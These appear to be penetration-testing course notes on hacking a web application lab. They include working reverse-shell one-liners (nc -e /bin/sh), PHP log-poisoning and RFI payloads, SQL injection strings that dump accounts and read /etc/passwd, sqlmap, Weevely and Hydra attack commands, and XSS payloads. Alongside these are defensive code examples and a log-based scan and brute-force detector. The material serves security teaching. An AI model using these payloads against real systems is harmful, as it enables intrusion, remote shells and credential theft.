# Website Hacking

## Information Gathering

What to collect about the target:

- IP address
- Domain name info
- Technologies used
- Other websites on the same server
- DNS records
- Unlisted files, sub-domains, directories

Tools:

- Whois lookup - find info about the owner of the target
- Netcraft Site Report - shows technologies used on the target
- Robtex DNS lookup - shows comprehensive info about the target website
### Websites on the Same Server

- One server can serve a number of websites
- Gaining access to one can help gain access to others
- To find websites on the same server:
  - Use Robtex DNS lookup under "names pointing to the same IP"
  - Using bing.com, search for `ip:[target ip]`
### Discovering Subdomains

Knock can be used to find subdomains of the target:

- Discover more information
- Discover new web applications
- Increase attack surface
- Discover management areas
- Beta / experimental features

```bash
knockpy google.com
```
### Files and Directories

Find files and directories in the target website with a tool called dirb:

```bash
dirb [target] [wordlist] [options]
```
## Exploitation

### File Upload Vulnerabilities

- Simple type of vulnerability
- Allows users to upload executable files such as PHP
- Upload a PHP shell or backdoor, e.g. Weevely:
  1. Generate backdoor: `weevely generate [password] [filename]`
  2. Upload the generated file
  3. Connect to it: `weevely [url to file] [password]`
- See `weevely --help` to find out how to use it
### Code Execution Vulnerabilities

- If there is a form field or parameter whose value ends up in a system command
- Allows an attacker to execute OS commands (Windows or Linux commands)
- Can be used to get a reverse shell
- Or upload any file using the wget command
- Code execution commands are attached in the resources

```bash
# Listen on your machine on port 8080
nc -vv -l -p 8080
# Run on the target: the IP address is your machine's, so this connects
# from the remote machine back to your machine
nc -e /bin/sh 10.20.14.203 8080
```
### Local File Inclusion

- If there is a URL like this: `?page=include.php`
- Allows an attacker to read any file on the same server
- Access files outside the www directory

Shell from LFI: try to inject code into readable files. Examples:

- `/proc/self/environ`: with Burp Suite, modify the User-Agent header to:

  ```php
  <?passthru("nc -e /bin/sh 10.20.14.208 8888");?>
  ```

- `/var/log/auth.log`: the username given to ssh is written to the log:

  ```bash
  ssh "<?passthru('nc -e /bin/sh 10.20.14.208 8888');?>"@10.20.14.210
  # or encode the payload with base64 (e.g. in Burp Suite) and use:
  ssh "<?passthru(base64_decode('dkfhewkhohwkeff'));?>"@10.20.14.210
  ```

- `/var/log/apache2/access.log`
### Remote File Inclusion

- If there is a URL like this: `?page=include.php`, put in `/?page=http://10.20.14.203/reverse.txt`
- Similar to local file inclusion
- But allows an attacker to read any file from any server
- Execute PHP files from other servers on the current server
- Store PHP files on other servers as `.txt`

Requires these settings in `/etc/php5/cgi/php.ini` on the target:

```ini
allow_url_fopen = on
allow_url_include = on
```

```php
<?php
// save this as a .txt file on a web server the target can reach, such as the one on Kali
passthru("nc -e /bin/sh 10.20.14.203 8080");
?>
```
### Mitigation

- File upload vulns: only allow safe files to be uploaded
- Code execution vulns:
  - Don't use dangerous functions
  - Filter user input before execution
- File inclusion:
  - Disable `allow_url_fopen` and `allow_url_include`
  - Use static file inclusion
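The three mitigations above, as an added Python example (this is not code from the original notes, nor from Mutillidae or any other project they mention): an extension allowlist with server-chosen names for uploads, a fixed page map instead of a user-controlled include path, and a strict host check plus argument-list execution for a ping-style lookup box. The allowlist contents, the page names and the host pattern are assumptions made for the example.

```python
import re
import subprocess
import uuid
import posixpath

# --- File upload: extension allowlist + server-generated file name ---
# The set of accepted extensions is an assumption for this example.
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def safe_stored_name(user_filename):
    """Return a server-generated name for an accepted upload, or None to reject.

    Only the final extension is checked against the allowlist, and the user's
    base name is thrown away: 'shell.php' is rejected, and 'shell.php.png' is
    stored as '<random hex>.png', so no 'php' survives in the stored name.
    """
    _, ext = posixpath.splitext(user_filename.lower())
    if ext not in ALLOWED_UPLOAD_EXT:
        return None
    return uuid.uuid4().hex + ext


# --- File inclusion: static map instead of building a path from ?page= ---
# Page names and paths are assumptions for this example.
PAGES = {
    "home": "pages/home.php",
    "login": "pages/login.php",
    "user-info": "pages/user-info.php",
}


def resolve_page(page_param):
    """Map the ?page= value to one of a fixed set of files.

    Unlisted values are refused, so traversal ('../../etc/passwd') and
    remote URLs ('http://.../reverse.txt') never reach the filesystem or
    the network.
    """
    return PAGES.get(page_param)


# --- Command execution: strict validation, and no shell ---
# Host name or dotted IP: letters, digits, hyphens and dots only.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_ping_argv(host):
    """Return the argv list for a single ping, or raise ValueError.

    The pattern rejects shell metacharacters (';', '|', '`', spaces, ...)
    outright, and the command is run as an argument list rather than
    through a shell, so even a character that slipped past the check would
    be handed to ping literally instead of being interpreted.
    """
    if len(host) > 253 or not HOSTNAME_RE.match(host):
        raise ValueError("invalid host name")
    return ["ping", "-c", "1", host]


def run_ping(host):
    """Validate, then execute without shell=True (not exercised by the test)."""
    argv = build_ping_argv(host)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout
```

The upload check deliberately ignores the client-supplied name entirely when choosing where to store the file; combined with an extension allowlist this also defeats double-extension names, which matters on servers that map `x.php.png` to the PHP handler.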
## SQL Injection

- They are everywhere
- Gives access to the database - sensitive data
- Can be used to read local files outside the www root
- Can be used to log in as admin and further exploit the system
- Can be used to upload files
### Discovering SQLi in POST

- Try to break the page
- Using `and`, `order by` or `'`
- Test text boxes and URL parameters on the form

```sql
# use a single quote when logging in to see the code
# use and 1=1
# and 1=0 to see if that works in the case of blind SQL injection
# aNd 111=111
# OrDeR bY 1
# input your code like this in the password field:
123456' code here#
# bypass the need for a password in the password field
aaa' or 1=1 #
# bypass the need for a password in the username field
admin' #
```

The same works with URLs, e.g. if the URL has `?page=user-info.php&username=caleb`:

```sql
# you can inject
?page=user-info.php&username=caleb' order by 1#
# then use union selects to enumerate tables, columns and data
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'
union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'
union select 1,username,password,is_admin,5 from accounts
# read local files / write files
union select null,load_file('/etc/passwd'),null,null,null
union select null,'example example',null,null,null into outfile '/var/www/mutillidae/example.txt'
# filter bypass: mixed case and comments instead of spaces
uNiOn/**/sElEcT/**/1,2/**/%23
```
### Exploitation

- SQLMap was designed to exploit SQL injections
- Works with many DB types: MySQL, MSSQL, etc.
- Can be used to perform everything we learned and more

```bash
sqlmap --help
# -u takes the full URL, including all the parameters that come after it
sqlmap -u [target url]
# Get the DBs
sqlmap -u URL --dbs
# Current user, database, tables, columns, data
sqlmap -u URL --current-user
sqlmap -u URL --current-database
sqlmap -u URL --tables -D owasp10
sqlmap -u URL --columns -T accounts -D owasp10
sqlmap -u URL -T accounts -D owasp10 --dump
```
### Preventing SQLi

- Filters can be bypassed
- Use a blacklist of commands? Still can be bypassed
- Use a whitelist? Same issue
- Use parameterized statements: separate data from SQL code

```php
$stmt = $db->prepare("select * from accounts where username = ?");
// the whole string, quote and all, is sent as a value, never as SQL
$stmt->execute(array("admin' union select #"));
```
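The parameterized-statement point above, as an added Python example using sqlite3 (this is not code from the original notes or from Mutillidae): the same login query built by string formatting and then with placeholders, run against a constructed in-memory `accounts` table. SQLite takes `--` as the comment marker where MySQL (the database behind the notes' payloads) also accepts `#`, so the payloads below end with `--`.

```python
import sqlite3


def setup_db():
    """Constructed in-memory stand-in for the lab's 'accounts' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "s3cret", 1), ("caleb", "hunter2", 0)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query with string formatting: the input becomes SQL code.

    A username of  admin' --  closes the string literal and comments out the
    password check, so the row for admin comes back without the password.
    """
    query = (
        "SELECT username FROM accounts "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Parameterized: the driver sends the values separately from the SQL text,
    so the quote and the comment marker stay inside the data and match nothing."""
    query = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    db = setup_db()
    for user in ("admin", "admin' --", "aaa' or 1=1 --"):
        print(repr(user), login_vulnerable(db, user, "wrong"), login_safe(db, user, "wrong"))
```

No escaping or keyword filtering is involved in `login_safe`; the placeholders are what separate data from code, which is why the notes recommend them over blacklists and whitelists.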
## XSS Vulnerabilities

- Allows an attacker to inject JavaScript code into the page
- Code is executed when the page loads
- Code is executed on the client machine, not the server
- Three main types:
  1. Persistent/stored XSS
  2. Reflected XSS
  3. DOM-based XSS

### Discovering XSS

- Try to inject JavaScript code into the pages
- Test text boxes and URL parameters on the form

### Reflected XSS

- Non-persistent, not stored
- Only works if the target visits a specially crafted URL

```
http://target.com/page.php?something=<script>alert("XSS")</script>
```

Payload:

```html
<script>alert("XSS")</script>
```

### Stored XSS

- Persistent, stored on the page or in the DB
- The injected code is executed every time the page is loaded
### Exploiting XSS

- Run any JavaScript code
- The BeEF framework can be used to hook targets:
  - Inject the BeEF hook in vulnerable pages
  - Execute code from BeEF

### Preventing XSS Vulns

- Minimise the usage of user input in HTML
- Escape any untrusted input before inserting it into the page
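The escaping advice above, as an added Python example (not code from the original notes or from any project they mention): a reflected search term rendered raw and then HTML-escaped, plus the one case escaping alone does not cover, a user-supplied URL placed in an `href`, where a `javascript:` scheme is ordinary text that still executes and has to be refused by a scheme allowlist. The templates and the http/https allowlist are assumptions for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed page fragments that reflect request parameters.
RESULTS_TEMPLATE = "<h1>Results for: {term}</h1>"
LINK_TEMPLATE = '<a href="{href}">next</a>'


def render_vulnerable(term):
    """Drops the raw parameter into the HTML: a <script> in it becomes live code."""
    return RESULTS_TEMPLATE.format(term=term)


def render_safe(term):
    """Escapes <, >, &, \" and ' first, so the browser shows the text instead of running it."""
    return RESULTS_TEMPLATE.format(term=html.escape(term, quote=True))


def safe_href(url):
    """Escaping is not enough inside href: 'javascript:alert(1)' contains no
    special characters yet runs when clicked. Allow only http(s) URLs (an
    assumption for this example), replace anything else with '#', and then
    escape the survivor for the attribute context."""
    cleaned = url.strip()
    if urlsplit(cleaned).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def render_link(url):
    """Render a link whose target came from the request."""
    return LINK_TEMPLATE.format(href=safe_href(url))


def contains_script_tag(rendered):
    """Crude marker used only to show the difference between the two renderers."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    payload = '<script>alert("XSS")</script>'
    print(render_vulnerable(payload))
    print(render_safe(payload))
    print(render_link("javascript:alert(1)"))
```

The escaping function depends on where the value lands: text between tags and quoted attribute values are covered by `html.escape`, while URLs, inline JavaScript and CSS each need their own rules, which is why the notes' first recommendation is to minimise how much user input reaches the HTML at all.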
## Brute Force & Dictionary Attacks

Crunch can be used to create a wordlist.

Syntax: `crunch [min] [max] [characters] -t [pattern] -o [FileName]`

Example (crunch requires min and max to equal the pattern length when `-t` is used; `-o` writes the list to a file):

```bash
crunch 6 6 123abc$ -t a@@@@b -o wordlist
```

### Wordlists

### Hydra

Hydra is a brute-force tool that can be used to brute-force almost any authentication service.

Syntax: `hydra [IP] -L [usernames] -P [passwords] [service]`

Example:

```bash
hydra 10.20.14.212 -l admin -P /root/wordlist.txt http-post-form "mutillidae/?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:F=Not Logged In"
```
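The dirb scan described earlier in these notes and the Hydra run above both leave a distinctive trace in the web server's access log: a burst of 404s from one address, and a burst of POSTs to the login page from one address. As an added Python example (not from the original notes), the code below parses constructed Apache combined-format log lines and flags either pattern per source address and minute. The sample lines, the thresholds and the `login.php` path marker are assumptions for the example.

```python
import re
from collections import Counter
from datetime import datetime

# Apache combined log format: ip ident user [time] "request" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: six 404s in one minute from one address (directory
# guessing), then six POSTs to the login page in one minute from the same
# address (password guessing), with one ordinary visitor in between.
SAMPLE_LOG = """
10.20.14.212 - - [10/Oct/2024:13:55:01 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:55:02 +0000] "GET /backup/ HTTP/1.1" 404 196 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:55:03 +0000] "GET /cgi-bin/ HTTP/1.1" 404 196 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:55:04 +0000] "GET /config/ HTTP/1.1" 404 196 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:55:05 +0000] "GET /dev/ HTTP/1.1" 404 196 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:55:06 +0000] "GET /old/ HTTP/1.1" 404 196 "-" "-"
10.20.14.5 - - [10/Oct/2024:13:56:10 +0000] "GET /mutillidae/ HTTP/1.1" 200 5120 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:57:10 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:57:11 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:57:12 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:57:13 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:57:14 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
10.20.14.212 - - [10/Oct/2024:13:57:15 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
10.20.14.5 - - [10/Oct/2024:13:57:30 +0000] "POST /mutillidae/?page=login.php HTTP/1.1" 200 4210 "-" "-"
""".strip().splitlines()


def parse_line(line):
    """Return ip, minute bucket, method, path and status for one line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "minute": ts.replace(second=0),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect(lines, not_found_threshold=5, login_threshold=5, login_path="login.php"):
    """Flag (ip, minute) pairs with too many 404s or too many login POSTs.

    Thresholds are assumptions; tune them to the site's normal traffic.
    """
    not_found = Counter()
    login_posts = Counter()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["ip"], ev["minute"])
        if ev["status"] == 404:
            not_found[key] += 1
        if ev["method"] == "POST" and login_path in ev["path"]:
            login_posts[key] += 1

    alerts = []
    for kind, counts, threshold in (
        ("dir-scan", not_found, not_found_threshold),
        ("login-brute", login_posts, login_threshold),
    ):
        for (ip, minute), n in sorted(counts.items()):
            if n >= threshold:
                alerts.append({"kind": kind, "ip": ip,
                               "minute": minute.isoformat(), "count": n})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Per-minute buckets keep the logic simple; a sliding window catches bursts that straddle a minute boundary, and in production the same counters feed an account lockout or rate limit rather than only an alert.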
## Discovering Vulnerabilities Automatically

### Zed Attack Proxy (ZAP)

- Automatically finds vulnerabilities in web applications
- Free and easy to use
- Can also be used for manual testing

## Pentest Methodology

1. Info gathering
2. For every domain / subdomain:
   - Click on every link
   - For every link, test the parameters